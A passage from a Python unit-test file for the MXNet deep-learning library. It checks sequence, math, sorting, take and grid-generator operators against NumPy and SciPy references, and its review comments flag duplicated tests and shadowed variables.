                    gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
                    check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
                    # gradient check for every grad_req mode on the data input
                    check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
                                           numeric_eps=1e-2, rtol=1e-2)
                    check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
                                           numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
                    check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
                                           numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
    """Exercise SequenceLast with the sequence axis in either position."""
    for ax in (0, 1):
        check_sequence_func("last", axis=ax)
@with_seed()
def test_sequence_mask():
    """Exercise SequenceMask on both axis layouts with non-trivial fill values."""
    for ax, fill in ((0, -2.3), (1, 0.3)):
        check_sequence_func("mask", axis=ax, mask_value=fill)
def check_sequence_reverse(xpu):
    """Check SequenceReverse forward output against hand-computed expectations.

    Uses a fixed (3, 2, 3) input (seq axis 0, batch axis 1) with several
    sequence-length settings, plus one 2-D case.
    """
    # sample data
    arr = np.array(
        [[[ 1., 2., 3.],
          [ 4., 5., 6.]],
         [[ 7., 8., 9.],
          [ 10., 11., 12.]],
         [[ 13., 14., 15.],
          [ 16., 17., 18.]]])

    # expected: full reversal of all 3 sequence steps
    arr1 = np.array(
        [[[ 13., 14., 15.],
          [ 16., 17., 18.]],
         [[ 7., 8., 9.],
          [ 10., 11., 12.]],
         [[ 1., 2., 3.],
          [ 4., 5., 6.]]])

    # expected: only the first 2 steps reversed (lengths [2, 2])
    arr2 = np.array(
        [[[ 7., 8., 9.],
          [ 10., 11., 12.]],
         [[ 1., 2., 3.],
          [ 4., 5., 6.]],
         [[ 13., 14., 15.],
          [ 16., 17., 18.]]])

    # expected: per-batch lengths [2, 3] -- batches reversed independently
    arr3 = np.array(
        [[[ 7., 8., 9.],
          [ 16., 17., 18.]],
         [[ 1., 2., 3.],
          [ 10., 11., 12.]],
         [[ 13., 14., 15.],
          [ 4., 5., 6.]]])

    # test for matrix case
    seq_len_1 = [1, 2, 2]
    arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
    arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)

    def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
        """Bind and run SequenceReverse on `arr`; returns the forward output."""
        # MxNet symbol creation
        seq = mx.sym.Variable('seq')
        if sequence_length and use_sequence_length:
            seq_len = mx.sym.Variable('seq_len')
        else:
            # ensure that both are disabled, not just one
            seq_len=None
            use_sequence_length=False
        rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
        # MxNet symbol execution
        if sequence_length:
            bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
        else:
            bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
        fwd = bound.forward()
        return fwd[0].asnumpy()

    # test cases
    assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
    assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
    assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
    assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
    assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
    """Run the generic SequenceReverse check plus the fixed-data CPU check."""
    check_sequence_func("reverse", axis=0)
    check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
                             forward_mxnet_call,
                             forward_numpy_call,
                             backward_numpy_call1,
                             backward_numpy_call2,
                             data1_init=2.,
                             data2_init=3.,
                             grad_init=2.):
    """Forward/backward check of a binary math operator.

    Builds a (3, 4) constant-filled pair of inputs, compares the MXNet
    forward result against `forward_numpy_call`, and the two input gradients
    against `backward_numpy_call1/2` scaled by a constant head gradient.
    `name` is kept for call-site readability only.
    """
    lhs_sym = mx.symbol.Variable('data1')
    rhs_sym = mx.symbol.Variable('data2')
    shape = (3, 4)
    lhs_np = np.random.rand(3, 4)
    rhs_np = np.random.rand(3, 4)
    # the random draws above are immediately overwritten with constants
    lhs_np[:] = data1_init
    rhs_np[:] = data2_init
    lhs_nd = mx.nd.array(lhs_np)
    rhs_nd = mx.nd.array(rhs_np)
    lhs_grad = mx.nd.empty(shape)
    rhs_grad = mx.nd.empty(shape)
    net = forward_mxnet_call(lhs_sym, rhs_sym)
    executor = net.bind(default_context(), args=[lhs_nd, rhs_nd], args_grad=[lhs_grad, rhs_grad])
    executor.forward(is_train=True)
    assert_almost_equal(executor.outputs[0].asnumpy(), forward_numpy_call(lhs_np, rhs_np))
    # backward with a constant head gradient
    head_grad = mx.nd.empty(shape)
    head_grad[:] = grad_init
    executor.backward(head_grad)
    head_grad_np = np.ones(shape)
    head_grad_np[:] = grad_init
    assert_almost_equal(lhs_grad.asnumpy(), head_grad_np * backward_numpy_call1(lhs_np, rhs_np))
    assert_almost_equal(rhs_grad.asnumpy(), head_grad_np * backward_numpy_call2(lhs_np, rhs_np))
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
    """Forward/backward check of a unary math operator.

    Builds a (3, 4) array filled with `data_init`, compares the MXNet forward
    result against `forward_numpy_call`, and the input gradient against
    `backward_numpy_call` scaled by a constant head gradient of `grad_init`.
    `name` is kept for call-site readability only.
    """
    in_sym = mx.symbol.Variable('data')
    shape = (3, 4)
    in_np = np.ones(shape)
    in_np[:] = data_init
    in_nd = mx.nd.array(in_np)
    grad_nd = mx.nd.empty(shape)
    grad_nd[:] = 3  # dummy seed value; backward fills this buffer
    executor = forward_mxnet_call(in_sym).bind(default_context(), args=[in_nd], args_grad=[grad_nd])
    executor.forward(is_train=True)
    assert_almost_equal(executor.outputs[0].asnumpy(), forward_numpy_call(in_np))
    # backward with a constant head gradient
    head_grad = mx.nd.empty(shape)
    head_grad[:] = grad_init
    expected_grad = head_grad.asnumpy() * backward_numpy_call(in_np)
    executor.backward(head_grad)
    assert_almost_equal(grad_nd.asnumpy(), expected_grad)
@with_seed()
def test_special_functions_using_scipy():
    """Check gamma, gammaln, erf and erfinv against scipy.special references.

    NOTE(review): an identically named test is re-defined later in this file
    and shadows this one, so this definition never runs under the test
    runner -- the duplicate should be merged or renamed.
    """
    try:
        from scipy import special as scipy_special
    except ImportError:
        # FIX: only a missing scipy should skip; the previous bare `except:`
        # also swallowed unrelated errors
        print("Could not import scipy. Skipping unit tests for special functions")
        return

    # gamma: d/dx gamma(x) = gamma(x) * psi(x)
    mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
                      lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
    # gammaln: d/dx ln(gamma(x)) = psi(x)
    mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
                      lambda x: scipy_special.psi(x), 0.5, 0.5)
    # erf: d/dx erf(x) = 2/sqrt(pi) * exp(-x^2)
    mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
                      lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
    # erfinv: d/dx erfinv(x) = sqrt(pi)/2 * exp(erfinv(x)^2)
    mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
                      lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
    """Forward-only check of a rounding-style operator against NumPy.

    No backward pass is run here; `name` and `grad_init` are kept only for
    signature compatibility with `mathematical_core`.
    """
    in_sym = mx.symbol.Variable('data')
    in_np = np.ones((3, 4))
    in_np[:] = data_init
    executor = forward_mxnet_call(in_sym).bind(default_context(), args=[mx.nd.array(in_np)])
    executor.forward(is_train=True)
    assert_almost_equal(executor.outputs[0].asnumpy(), forward_numpy_call(in_np))
@with_seed()
def test_mathematical():
    """Check elementwise math operators (and their derivatives, where defined)
    against their NumPy counterparts via `mathematical_core`,
    `mathematical_core_binary` and `rounding`.

    Each backward lambda is the analytic derivative of the forward function;
    init values like 0.5 keep inputs inside each function's domain.
    """
    # rsqrt
    mathematical_core("rsqrt",
                      lambda x: mx.sym.rsqrt(x),
                      lambda x: 1 / np.sqrt(x),
                      lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
    # tan
    mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
    # arcsin
    mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
                      lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
    # arccos
    mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
                      lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
    # arctan
    mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
                      lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
    # hypot
    mathematical_core_binary("hypot",
                             lambda x, y: mx.sym.hypot(x, y),
                             lambda x, y: np.hypot(x, y),
                             lambda x, y: x / np.hypot(x, y),
                             lambda x, y: y / np.hypot(x, y),
                             0.5, 0.5, 0.5)
    # hypot scalar
    mathematical_core("hypot scalar",
                      lambda x: mx.sym.hypot(x, 3),
                      lambda x: np.hypot(x, 3),
                      lambda x: x / np.hypot(x, 3),
                      0.5, 0.5)
    # degrees -- derivative is the constant 180/pi
    mathematical_core("degrees",
                      lambda x: mx.sym.degrees(x),
                      lambda x: np.degrees(x),
                      lambda x: 180./np.pi,
                      0.5, 0.5)
    # radians -- derivative is the constant pi/180
    mathematical_core("radians",
                      lambda x: mx.sym.radians(x),
                      lambda x: np.radians(x),
                      lambda x: np.pi / 180.,
                      0.6, 1)
    # sinh
    mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
    # cosh
    mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
    # tanh
    mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
    # arcsinh
    mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
                      lambda x: 1./(x**2 + 1.)**(1./2.))
    # arccosh
    mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
                      lambda x: 1./(x**2 - 1.)**(1./2.))
    # arctanh
    mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
                      lambda x: -1./(x**2 - 1.), 0.5)
    # log1p
    mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
                      lambda x: 1. / (1.0 + x), 0.5, 0.5)
    # expm1
    mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
                      lambda x: np.exp(x), 0.5, 0.5)
    # log10
    mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
                      lambda x: 1. / (x * np.log(10.)))
    # log2
    mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
                      lambda x: 1. / (x * np.log(2.)))
    # rint -- forward-only (rounding has zero/undefined gradient)
    rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
    # fix -- forward-only
    rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
    """Check gamma, gammaln, erf and erfinv against scipy.special references.

    NOTE(review): this re-definition shadows an identically named test defined
    earlier in this file. The erf/erfinv cases from the shadowed definition
    are included here so the shadowing does not silently drop their coverage;
    the duplicate definitions should eventually be merged.
    """
    try:
        from scipy import special as scipy_special
    except ImportError:
        # FIX: only a missing scipy should skip; the previous bare `except:`
        # also swallowed unrelated errors
        print("Could not import scipy. Skipping unit tests for special functions")
        return

    # gamma: d/dx gamma(x) = gamma(x) * psi(x)
    mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
                      lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
    # gammaln: d/dx ln(gamma(x)) = psi(x)
    mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
                      lambda x: scipy_special.psi(x), 0.5, 0.5)
    # erf: d/dx erf(x) = 2/sqrt(pi) * exp(-x^2)
    mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
                      lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
    # erfinv: d/dx erfinv(x) = sqrt(pi)/2 * exp(erfinv(x)^2)
    mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
                      lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
@with_seed()
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/12901")
def test_clip():
    """Check mx.sym.clip forward against np.clip and its gradient against the
    indicator of the open clip interval."""
    data = mx.symbol.Variable('data')
    shape = (30, 30)
    values = np.random.uniform(-1, 1, shape)
    clipped = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
    check_symbolic_forward(clipped, [values], [np.clip(values, -0.6, 0.6)])
    # gradient is 1 strictly inside (-0.6, 0.6) and 0 outside
    inside = np.logical_and(values < 0.6, values > -0.6).astype(np.float64)
    check_symbolic_backward(clipped, [values], [np.ones(shape)], [inside])
@with_seed()
def test_init():
    """Check value-initializer symbols (zeros/ones) and the arange family of
    operators against their NumPy equivalents."""

    def test_basic_val_init(sym_func, np_func, shape, dtype):
        """Forward a no-input initializer symbol and compare values and dtype."""
        x = sym_func(shape=shape, dtype=dtype)
        exe = x.bind(default_context(), args=[], args_grad=[])
        exe.forward(is_train=True)
        assert_almost_equal(exe.outputs[0].asnumpy(), np_func(shape=shape, dtype=dtype))
        assert exe.outputs[0].asnumpy().dtype == dtype

    def test_arange():
        """Compare mx.nd.arange(+repeat) with np.arange/np.repeat for several
        start/stop/step configurations and dtypes."""
        # General Random Tests
        dtype_list = [np.float32, np.float64, np.int32, np.uint8]
        config_list = [(10,),
                       (0, 10),
                       (5, 100, 4),
                       (50, -50, -2),
                       (-100, 100, 1),
                       (1.3, 456.6, 1.3)]
        for dtype in dtype_list:
            for config in config_list:
                repeats = random.choice([1, 3])
                np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
                nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
                assert_almost_equal(np_out, nd_out.asnumpy())

    def test_arange_inferstop():
        """With stop=None and infer_range=True the stop is inferred from the
        shape of the other operand (here 5)."""
        s = mx.sym.arange(start=0, stop=None, infer_range=True)
        s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
        exe = s.bind(ctx=mx.cpu(), args={})
        exe.forward()
        assert_almost_equal(exe.outputs[0].asnumpy(), np.array([0,1,2,3,4]))

    def test_arange_like():
        """arange_like with an explicit axis ranges over that axis's length."""
        shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
        axis_list = [0, -1]
        for sh in shape_list:
            for axis in axis_list:
                val = np.random.rand(*sh)
                data = mx.nd.array(val)
                nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
                np_out = np.arange(start=0, stop=sh[axis])
                assert_almost_equal(nd_out.asnumpy(), np_out)

    def test_arange_like_without_axis():
        """Without an axis, arange_like ranges over the total element count
        and keeps the input's shape."""
        shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
        for sh in shape_list:
            val = np.random.rand(*sh)
            data = mx.nd.array(val)
            nd_out = mx.nd.contrib.arange_like(data, start=0)
            np_out = np.arange(start=0, stop=val.size)
            assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))

    test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
    test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
    test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
    test_arange()
    test_arange_inferstop()
    test_arange_like()
    test_arange_like_without_axis()
@with_seed()
def test_order():
    """Check topk / sort / argsort / argmax / argmin against a NumPy reference
    (`gt_topk`) for values, indices and mask return types."""
    ctx = default_context()

    def gt_topk(dat, axis, ret_typ, k, is_ascend):
        """NumPy reference for topk.

        ret_typ 'indices' returns the top-k indices, 'value' the top-k values;
        anything else is treated as 'mask' (1 at top-k positions, 0 elsewhere)
        and is only supported for the fixed (5, 5, 5, 5) shape with axis None
        or 1.
        """
        if ret_typ == "indices":
            if is_ascend:
                indices = np.arange(k)
            else:
                # the k largest, in descending order, via negative indexing
                indices = np.arange(-1, -k-1, -1)
            ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
        elif ret_typ == "value":
            if is_ascend:
                indices = np.arange(k)
            else:
                indices = np.arange(-1, -k-1, -1)
            ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
        else:
            assert dat.shape == (5, 5, 5, 5)
            assert axis is None or axis == 1
            ret = np.zeros(dat.shape)
            if is_ascend:
                indices = np.arange(k)
            else:
                indices = np.arange(-1, -k-1, -1)
            gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
            if axis is None:
                ret.ravel()[gt_argsort] = 1
            else:
                # NOTE(review): the inner `for k in range(5)` shadows the
                # parameter `k`; harmless here because `indices` was already
                # computed above, but worth renaming.
                for i in range(5):
                    for j in range(5):
                        for k in range(5):
                            ret[i, gt_argsort[i, :, j, k], j, k] = 1
        return ret

    # shuffled permutation of 0..624 reshaped to 4-D: all values distinct,
    # so top-k results are unambiguous
    dshape = (5, 5, 5, 5)
    a_npy = np.arange(np.prod(dshape)).astype(np.float32)
    np.random.shuffle(a_npy)
    a_npy = a_npy.reshape(dshape)
    a = mx.sym.Variable('a')

    def get_large_matrix():
        """Return a (100, 300096) matrix of row-wise shuffled permutations."""
        data = np.array([np.arange(300096).astype(np.float32)])
        data = np.repeat(data, 100, axis=0)
        np.apply_along_axis(np.random.shuffle, 1, data)
        return data

    large_matrix_npy = get_large_matrix()

    # topk with ret_typ="value" across axes, k values and both sort orders
    for axis in [1, 3, None]:
        K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
        for k in K:
            for is_ascend in [True, False]:
                b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
                out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
                check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
                check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])

    # full sort (equivalent to topk with k == axis length / total size)
    for axis in [1, 3, None]:
        for is_ascend in [True, False]:
            b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
            if axis is None:
                out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
            else:
                out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
            check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
            check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])

    # NOTE(review): from here on `is_ascend` is the leftover loop variable
    # (False after the loops above) -- presumably intentional, but fragile.
    # Index-typed outputs propagate zero gradient, hence the zeros expectations.
    b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
    check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
                            out_grads=[np.random.normal(size=(100, 5))],
                            expected=[np.zeros((100, 300096))])
    check_symbolic_forward(b, location={'a': large_matrix_npy},
                           expected=[gt_topk(dat=large_matrix_npy, axis=1,
                                             ret_typ="indices", k=5,
                                             is_ascend=is_ascend)])

    b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
    check_symbolic_backward(sym=b, location={'a': a_npy},
                            out_grads=[np.random.normal(size=(5, 5, 5, 3))],
                            expected=[np.zeros((5, 5, 5, 5))])
    # NOTE(review): expectation hard-codes is_ascend=False while the symbol
    # uses the leftover `is_ascend`; consistent only because that value is
    # False here -- TODO confirm and make explicit.
    check_symbolic_forward(b, location={'a': a_npy},
                           expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
                                             is_ascend=False)])

    b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
    check_symbolic_backward(sym=b, location={'a': a_npy},
                            out_grads=[np.random.normal(size=(5, 5, 5, 5))],
                            expected=[np.zeros((5, 5, 5, 5))])
    check_symbolic_forward(b, location={'a': a_npy},
                           expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
                                             is_ascend=True)])

    b = mx.sym.argsort(a, axis=1, is_ascend=False)
    check_symbolic_backward(sym=b, location={'a': a_npy},
                            out_grads=[np.random.normal(size=(5, 5, 5, 5))],
                            expected=[np.zeros((5, 5, 5, 5))])
    check_symbolic_forward(b, location={'a': a_npy},
                           expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
                                             is_ascend=False)])

    b = mx.sym.argmax(a, axis=1, keepdims=True)
    check_symbolic_backward(sym=b, location={'a': a_npy},
                            out_grads=[np.random.normal(size=(5, 5, 5, 5))],
                            expected=[np.zeros((5, 5, 5, 5))])
    check_symbolic_forward(b, location={'a': a_npy},
                           expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
                                             is_ascend=False)])

    b = mx.sym.argmin(a, axis=1, keepdims=True)
    check_symbolic_backward(sym=b, location={'a': a_npy},
                            out_grads=[np.random.normal(size=(5, 5, 5, 5))],
                            expected=[np.zeros((5, 5, 5, 5))])
    check_symbolic_forward(b, location={'a': a_npy},
                           expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
                                             is_ascend=True)])
@with_seed()
def test_blockgrad():
    """BlockGrad must pass data through unchanged on forward, and backward
    must run without error (gradients are absorbed)."""
    src = mx.sym.Variable('a')
    blocked = mx.sym.BlockGrad(src)
    exe = blocked.simple_bind(ctx=default_context(), a=(10, 10))
    value = np.random.rand(10, 10)
    exe.forward(is_train=True, a=value)
    assert_almost_equal(exe.outputs[0].asnumpy(), value)
    exe.backward()  # No error if BlockGrad works
@with_seed()
def test_take():
    """Check mx.sym.take forward/backward against np.take for random shapes,
    all axes and both index modes, plus gradient flow under autograd."""

    def grad_helper(grad_in, axis, idx):
        """Accumulate 1.0 into `grad_in` at index `idx` along `axis` --
        reference gradient for a head gradient of all-ones."""
        if axis == 0:
            # when `axis` is the last axis no trailing slice is needed
            if axis == len(grad_in.shape) - 1:
                grad_in[idx] += 1.0
            else:
                grad_in[idx, :] += 1.0
        elif axis == 1:
            if axis == len(grad_in.shape) - 1:
                grad_in[:, idx] += 1.0
            else:
                grad_in[:, idx, :] += 1.0
        elif axis == 2:
            if axis == len(grad_in.shape) - 1:
                grad_in[:, :, idx] += 1.0
            else:
                grad_in[:, :, idx, :] += 1.0
        elif axis == 3:
            if axis == len(grad_in.shape) - 1:
                grad_in[:, :, :, idx] += 1.0
            else:
                grad_in[:, :, :, idx, :] += 1.0
        elif axis == 4:
            grad_in[:, :, :, :, idx] += 1.0
        else:
            raise ValueError("axis %d is not supported..." % axis)

    def check_output_n_grad(data_shape, idx_shape, axis, mode):
        """Forward-compare with np.take and backward-compare against the
        gradient built by `grad_helper` for one shape/axis/mode combination."""
        data = mx.sym.Variable('a')
        idx = mx.sym.Variable('indices')
        idx = mx.sym.BlockGrad(idx)   # indices get no gradient
        result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
        exe = result.simple_bind(default_context(), a=data_shape,
                                 indices=idx_shape, axis=axis, mode=mode)
        data_real = np.random.normal(size=data_shape).astype('float32')
        idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
        # normalize negative axis for the reference computation below
        if axis < 0:
            axis += len(data_shape)

        # output shape is data shape with the taken axis replaced by idx_shape
        grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
        grad_in = np.zeros(data_shape, dtype='float32')

        exe.arg_dict['a'][:] = mx.nd.array(data_real)
        exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
        exe.forward(is_train=True)
        assert_almost_equal(exe.outputs[0].asnumpy(), np.take(data_real, idx_real, axis=axis, mode=mode))

        for i in np.nditer(idx_real):
            grad_helper(grad_in, axis, i)

        exe.backward([mx.nd.array(grad_out)])
        assert_almost_equal(exe.grad_dict['a'].asnumpy(), grad_in)

    def check_autograd_req():
        """Gradient through repeated nested take() calls under autograd must
        accumulate to all-ones over the source array."""
        row_len = 2
        col_len = 8
        shape = (row_len, col_len)
        sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
        sc.attach_grad()
        i = mx.nd.array([0], dtype="int64")
        j = mx.nd.array([0], dtype="int64")
        with mx.autograd.record(train_mode=True):
            xs = []
            for _ in range(row_len):
                x_i = []
                for _ in range(col_len):
                    # pick element (i, j) via two chained take()s
                    x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
                    x_i.append(x_ij)
                    j = j + 1
                i = i + 1
                j = j - col_len # reset j
                xs.append(mx.nd.stack(*x_i))
            x = mx.nd.stack(*xs)
            x = x.sum()
        x.backward()
        assert_almost_equal(np.ones(sc.grad.shape), sc.grad.asnumpy())

    # sweep random data/index shapes over every axis and both index modes
    for mode in ['clip', 'wrap']:
        for data_ndim in range(1, 5):
            for idx_ndim in range(1, 4):
                for axis in range(-data_ndim, data_ndim):
                    data_shape = ()
                    for _ in range(data_ndim):
                        data_shape += (np.random.randint(low=1, high=5), )
                    idx_shape = ()
                    for _ in range(idx_ndim):
                        idx_shape += (np.random.randint(low=1, high=5), )
                    check_output_n_grad(data_shape, idx_shape, axis, mode)

    check_autograd_req()
@with_seed()
def test_grid_generator():
    """Test GridGenerator forward/backward for 'affine' and 'warp' transforms."""
    # transform_type = affine
    test_case = [(20,21),(4,3),(6,12),(15,17)]
    for target_shape in test_case:
        affine_matrix = mx.sym.Variable('affine')
        grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
        exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
        # check forward: the identity affine matrix must reproduce the pixel grid
        exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
        exe.forward(is_train=True)
        output = exe.outputs[0].asnumpy()
        # map normalized [-1, 1] coordinates back to pixel indices
        output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
        output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
        xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
        assert_almost_equal(output[0,0], yv.T)
        assert_almost_equal(output[0,1], xv.T)
        # check backward: grad wrt affine equals out_grad dotted with the
        # homogeneous normalized grid coordinates (rows: x, y, 1)
        out_grad = np.random.normal(size=(1,2)+target_shape)
        exe.backward(mx.nd.array(out_grad))
        tmp = np.zeros((3,target_shape[0]*target_shape[1]))
        tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
        tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
        tmp[2] = 1
        grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
        assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est, rtol=1e-3, atol=1e-5)
        # check addto: grad_req='add' must accumulate onto the pre-filled grad
        exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
        grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
        exe.grad_dict['affine'][:] = grid_grad_npy
        exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
        exe.forward(is_train=True)
        exe.backward(mx.nd.array(out_grad))
        assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)

    # transform_type = warp
    test_case = [(12,21),(4,3),(6,12)]
    for target_shape in test_case:
        flow = mx.sym.Variable('flow')
        grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
        exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
        # check forward: an all-ones flow shifts the base grid by one pixel
        exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
        exe.forward(is_train=True)
        output = exe.outputs[0].asnumpy()
        output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
        output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
        xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
        assert_almost_equal(output[0,0], yv.T)
        assert_almost_equal(output[0,1], xv.T)
